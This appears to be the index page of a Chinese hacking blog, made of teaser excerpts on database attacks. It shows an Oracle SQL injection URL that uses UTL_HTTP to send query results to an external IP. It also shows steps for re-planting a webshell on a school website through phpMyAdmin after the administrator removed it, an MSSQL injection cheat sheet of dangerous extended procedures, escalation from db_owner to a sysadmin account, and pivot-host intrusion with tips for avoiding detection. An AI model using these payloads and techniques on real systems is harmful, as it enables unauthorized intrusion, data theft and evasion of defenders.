夜雨山庄

1 标准的Oracle 密码可以由英文字母，数字，#，下划线(_)，美元字符($)构成，密码的最大长度为30 字符；Oracle 密码不能以"$"，"#"，"_"或任何数字开头；密码不能包含"SELECT"，"DELETE"，"CREATE"这类的Oracle/SQL 关键字。
2 Oracle 的弱算法加密机制：两个相同的用户名和密码在两台不同的Oracle 数据库机器中，将具有相同的
哈希值。这些哈希值存储在SYS.USER$表中。可以通过像DBA_USERS 这类的视图来访问。
3 Oracle 默认配置下，每个帐户如果有10 次的失败登录，此帐户将会被锁定。但是SYS 帐户在Oracle 数
据库中具有最高权限，能够做任何事情，包括启动/关闭Oracle 数据库。即使SYS 被锁定，也依然能够访问
数据库。

» 阅读全文

url语句简单如下所示：

http://localhost/Kindle?jsp=1 and UTL_HTTP.request('外网ip:port/'||(sql语句))=1--

内容如下：

» 阅读全文

这个工具包分Linux/Unix版的和Windows版，考虑到大多数人都是使用的Windows系统，这里我把Windows版的Metasploit使用方法说明一下，至于Linux/Unix下的使用方法和Windows下的也是大同小异，这里就不额外的说明了。

    下载回Metasploit的安装程序之后双击安装，傻瓜化的安装过程，这里就不多说了。安装完成后可以看到安装目录下多了很多文件，主要的是：Msfconsole.bat和Msfweb.bat。第一个是这个工具包的控制台，第二个是这个程序的图形界面下的程序，下面我将和大家一起来领略它们的魅力！。

    命令行下使用Metasploit

运行后首先看到的是Metasploit欢迎界面，我们输入“？”

» 阅读全文

某个学校网站的shell被管理员del了，只好重新弄。
这次是利用phpMyAdmin
登录后..
首先：
create database joyuan; /* 建立数据库joyuan */
use joyuan; /* 连接joyuan数据库 */
create table shell(code text); /* 建立表shell字段code文本型数据text */

» 阅读全文

 Sql注射总结（早源于’or’1’=’1）
最重要的表名：
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
最重要的一些用户名（默认sql数据库中存在着的）
public
dbo
guest(一般禁止，或者没权限)
db_sercurityadmin
ab_dlladmin
一些默认扩展
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia 驱动器相关
xp_dirtree 目录
xp_enumdsn ODBC连接
xp_loginconfig 服务器安全模式信息
xp_makecab 创建压缩卷
xp_ntsec_enumdomains domain信息
xp_terminate_process 终端进程，给出一个PID

» 阅读全文

       在db_owner角色下添加SYSADMIN帐号，这招真狠啊，存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程，饶过了验证部分。具体方法如下

» 阅读全文

         网络入侵，安全第一。一个狡猾、高明的入侵者，不会冒然实行动。他们在入侵时前会做足功课，入侵时会通过各种技术手段保护自己，以防被对方发现，引火烧身。其中，跳板技术是攻击者通常采用的技术。下面笔者结合实例，解析攻击入侵中的跳板技术。
1、确定目标
2、设计跳板
3、跳板入侵
4、提权,获取自己想得到的信息
5、全身而退

» 阅读全文

我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，

» 阅读全文